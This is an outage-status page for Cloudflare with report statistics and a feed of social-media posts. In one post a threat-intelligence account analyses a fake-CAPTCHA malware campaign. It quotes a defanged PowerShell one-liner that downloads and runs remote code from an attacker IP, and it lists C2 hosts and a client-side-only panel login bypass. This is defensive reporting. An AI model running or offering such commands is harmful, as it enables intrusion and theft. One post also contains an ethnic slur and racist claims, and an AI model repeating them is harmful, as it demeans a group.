1. Home
  3. Companies
  5. Cloudflare
Cloudflare

Cloudflare status: hosting issues and outage reports

No problems detected

If you are having issues, please submit a report below.

Full Outage Map

Cloudflare is a company that provides DDoS mitigation, content delivery network (CDN) services, security and distributed DNS services. Cloudflare's services sit between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites.

Problems in the last 24 hours

The graph below depicts the number of Cloudflare reports received over the last 24 hours by time of day. When the number of reports exceeds the baseline, represented by the red line, an outage is determined.

At the moment, we haven't detected any problems at Cloudflare. Are you experiencing issues or an outage? Leave a message in the comments section!

Most Reported Problems

The following are the most recent problems reported by Cloudflare users through our website.

  • 36% Domains (36%)
  • 31% Cloud Services (31%)
  • 18% Hosting (18%)
  • 10% Web Tools (10%)
  • 5% E-mail (5%)

Live Outage Map

The most recent Cloudflare outage reports came from the following cities:

CityProblem TypeReport Time
Angers Cloud Services 5 days ago
London Domains 7 days ago
Noida Hosting 20 days ago
Jewar E-mail 21 days ago
Braga Web Tools 21 days ago
Noida Cloud Services 22 days ago
Full Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

  • khyimiq
    The Pajeet Files with Yasha (@khyimiq) reported

    Gotta love how Indians climb into high positions with fake degrees and then immediately start hiring other Indians with equally fake degrees. Then Cloudflare and AWS eat **** for an entire day and we’re all supposed to act shocked.

  • iam4x
    𝗶𝗮𝗺𝟰𝘅 (🌷,🦈) (@iam4x) reported

    @DegenCT @TheCryptoNexus - Proxy the ui api of hyperliquid through cloudflare to fetch sub-accounts - Then implementing the spot trading with support of sub-accounts

  • BertosonHunter
    Hunter Bertoson (@BertosonHunter) reported

    @jamesqquick Watched the network tab, reverse-engineered an undocumented API, and turned it into a Cloudflare Worker that catches failed attendance syncs and emails an alert every night. Workers + cron is unreasonably good for this kind of thing.

  • Doeyor
    doeyor.sol (@Doeyor) reported

    @trunoest Last night I bought into algopub at 140k and the website linked had a cloudflare login I clicked and it asked me to enter something in my windows run which was to allow the attacker to install a remote Trojan they could use later. I realized at the time like something was wrong here but didn’t immediately know what was up and was constantly checking my balance to essentially see everything disappear 5-10 minutes go by and nothing start thinking I’m in the clear go on with my night end up going to bed left my computer on but not locked wake up to find 0 SOL balance and a bunch of tabs open on my pc. Thankfully didn’t have any eth on based bot and he opened up axiom and exported my private keys and sent just the 5 sol (3 wallets) I have to this (BBNpySDumyS3k4mULaunbMfyZz1Bpbt2B5PwVVWZVy3F) looks like he got a few other people as well. can even see my sns doeyor.sol Could have truly ruined my life with the access he had to my full computer. Just a reminder to be ever vigilant; went ahead and wiped the 3 hard drives that were connected to my computer with kill disk and reinstalled a fresh windows this morning.

  • rohit_jsfreaky
    Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported

    @EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem

  • TsinoizItna
    Tsinoiz Itna (@TsinoizItna) reported

    @QuinnyPig @Cloudflare Try adding an IP access rule sometime... Google-level poor UI.

  • Khloes_Khloes
    KhloePai (@Khloes_Khloes) reported

    @Kitasure Yea, I've been noticing this in the evenings mostly. For me, its been any cloudflare service which discord uses to deliver media. I've been able to get around it with a vpn. Messages and connecting to vcs has been okay for the most part.

  • Calvin24seven
    Calvin (@Calvin24seven) reported

    @EddCoates Honeypots, cloudflare, fingerprinting, not giving so much value away for free would help. Site is great btw

  • dom000_dev
    AGK (Ejike) (@dom000_dev) reported

    @echo_vick To solve this use a VPN or use cloudflare WARP it'll reroute your network provider to use their proxy, case closed

  • thinkistillcare
    sw1tch.sh (@thinkistillcare) reported

    suddenly i start getting captchas on google and cloudflare it has to be my IPTV service on my fire stick right?

  • AdolfoUsier
    Adolfo 🦀🔺 | OpenCrabs Creator | truelens.tech®️ (@AdolfoUsier) reported

    @HyperTechInvest Cloudflare approach works at scale but self hosted agents sidestep the whole problem. @opencrabs runs on a single VPS with persistent state, free Xiaomi MiMo tokens til June 27 if you want to try it bro

  • techseovitals
    Martin Stepanek 🏳️‍🌈 (@techseovitals) reported

    🟣 Underrated #TechSEO Tip GPTBot, ClaudeBot, and PerplexityBot all respect robots.txt. Block them and your content never appears in AI answers. Worth flagging that Perplexity's compliance has been disputed – Cloudflare found evidence they used undeclared crawlers to bypass robots.txt. I see site owners block these crawlers without realizing they killed an entire traffic channel. Check your robots.txt right now. Look for blanket `Disallow: /` rules targeting AI user agents. You might be invisible in AI search and not even know it.

  • PethAU
    Sam Petherbridge (@PethAU) reported

    @adamlyttleapps @SwiftDev_UI @SynergyWS Shouldn’t be an issue. From memory Cloudflare does not cache HTML/PHP output by default

  • shcansh
    ./can (@shcansh) reported

    Adding validity checks for Azure and Salesforce tokens is the real win in the latest secret scanning updates. Instead of chasing ghosts, devs can now see if a leaked credential is still active. But with 11 GitLab token types added and new blocks for Cloudflare, we are putting a lot of trust in automated regex. Are active validity checks actually enough to stop the leak crisis, or are we just treating the symptoms of a broken secret-management culture?

  • ann1knit
    Ann the cat herder (@ann1knit) reported

    If cloudflare is so buggy and easily broken or hacked, why the frell hasn't someone come up with a better system or solution?

  • ShadeNoah
    ShadeNoah (@ShadeNoah) reported

    @EddCoates Yeah that sucks... Has been an issue forever, though. Nobody gives a **** about robots.txt... No wonder CDNs like Cloudflare pretty much have over half the internet on their servers by now. See if you can rate-limit every request, or bite the bullet and use a CDN. Godspeed, mate.

  • johnandrews
    John Andrews (@johnandrews) reported

    I was on one of these lists and it was very unfair.... a test QnA site deployment I can *almost* understand spamming, but even our best hardened instance in production was such a target, I eventually shut it down, rather than have it consume all backend attention and eventually pay Cloudflare to protect it. 30,000 useless test attacks per hour at one point... about 98% of actual traffic. And that was in the days when 80% of the script kiddies were manually starting/stopping their runs.

  • ozgrozer
    Ozgur Ozer (@ozgrozer) reported

    Today I decided to archive some of my failed projects. I never made money from them so it's time to let them go. I spent more than a year and some money on these 5 failed projects but still it's not a lose. I learned a lot about idea validation. I started my indie hacker journey 2 years ago with Next AI Tool directory. I scraped the internet so the site wouldn't look empty. There were 46k AI tools in the website on launch but a couple of weeks later Google blocked the domain on the search results lol. I made my first internet dollar with AI Renamer so it teached me lots of things about making a useful product, educating and supporting customers, marketing etc. It made $7k in the last year and still making a little so I'll keep it. Now my focus is on Grape, the AI note taking app. I only made one post on Reddit about the beta version of desktop app and since then it made 5 lifetime sales and currently has 1 active subscription. Now working on the mobile app. The failed projects, they were on my VPS using the CPU and memory. I removed their auth and dashboards to only keep their landing pages. That way I turned them into static sites and moved them from my VPS to Cloudflare Pages to host free. I'll still renew the domains because I still want to see them in the future. I can fail again but always will be learning from my mistakes and keep building until I make it.

  • specialkdelslay
    special k | CEO of stressed out era (@specialkdelslay) reported

    @TelepathicPug If u run a ping the ones causing an issue recently seem to belong to open ai gpt bot. Whether or not this is actually open ai doing this, or someone spawned their own tool using theirs, I do not know. IPs below. In order from worst to less worse for us: Meta bot Amazon bot Perplexity bot Cloudflare seems to block petal bot pretty effectively just by rate limiting but then we end up seeing that stupid chungus cloudflare page on the frontend. I blocked the entirety of China on nginx bc we don't do business there & I see no reason to take the hit for them. I am afraid to block Google bot even tho it's annoying bc then it might tank actual search, but idk I'm torn on that one.

  • kettanaito
    Artem Zakharchenko (@kettanaito) reported

    @dillon_mulroy If I can help folks write better tests, it's my pleasure. I've thrown any scenarios I could think of at it and it handled them well. It'd be great for more devs to try it out while I'm thinking whether it should be @msw/cloudflare or "msw/workerd".

  • QuinnyPig
    Corey Quinn (@QuinnyPig) reported

    @KhalidWarsa @Cloudflare The trick is to actually be a customer of the things you shitpost about, otherwise it's just noise.

  • spikeviper
    SpikeViper (@spikeviper) reported

    Hey @Cloudflare, you have charged me over $700 for a feature you are advertising as free in your docs, and your usage page shows me at $0 usage. Your support has failed to give me answers for over a month.

  • srrw2s
    seika (@srrw2s) reported

    OMG cloudflare,only if you could allow not using edge functions ,we would have not broken up

  • mrcauliman
    MRCΛULIMΛN (@mrcauliman) reported

    $XRP utility check. Magnetic looks like it’s having a hosting issue this morning. Cloudflare is up. Browser is up. Their origin server is timing out. XRPL is fine. The AMM pools are fine. If you’re trying to set a trustline or swap, use Bithomp, XPMarket, Sologenic, First Ledger, or Bear Swap until Magnetic is back. One front end is down. The ledger keeps moving.

  • DFIR_Radar
    DFIR Radar (@DFIR_Radar) reported

    AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

  • sdbrownlie
    Steve Brownlie (@sdbrownlie) reported

    @asaio87 For some things I found it more annoying than opus lol. I'm sure it was smarter - it realised some bug I was trying to solve was actually a cloudflare temporary/transient issue and it was right it went away by morning. gpt-5.5 didn't think to check that... but... other than that i agree it wasn't very different.

  • lynx769
    Lachlan (@lynx769) reported

    @EddCoates Are you using Cloudflare in front of it? It should help.

  • nikhildp
    Nikhil Agarwal (@nikhildp) reported

    @ade_oshineye Won't it be better to fix the obvious billing issue first so that startups can use cloudflare peacefully? How can there be no limit on expense? Company should not have bear insane expense because of a dev mistake which causes dynamic workflow to go in infinite loop.

  • chirag
    Chirag (@chirag) reported

    There's a case to run a meta network on Cloudflare rails. These childish things by the regime can be bypassed at scale.

  • didier_lopes
    Didier Lopes (@didier_lopes) reported

    For all the talk there is on Saaspocalypse - this is a refreshing take by @danshipper . "Sasspocalypse is dumb" Earlier in the podcast he also talks about his experience using SaaS where more and more of it is being driven by utilizing Codex. I can related with this a lot, as now a lot of times I have Codex open in a specific browser page and I'm working with that app from within codex. IF they support MCP, then I connect MCP as the agent is more efficient by doing so. If they don't, I just let it check the UI view (the same way I do) take screenshot and then click/drag/hover around. It's been interesting to do work this way. It's like I'm looking above the shoulder a pro at something I don't know about - e.g. setting up a Cloudflare environment. Not just it's doing the task but I'm learning from it because I can see what is happening.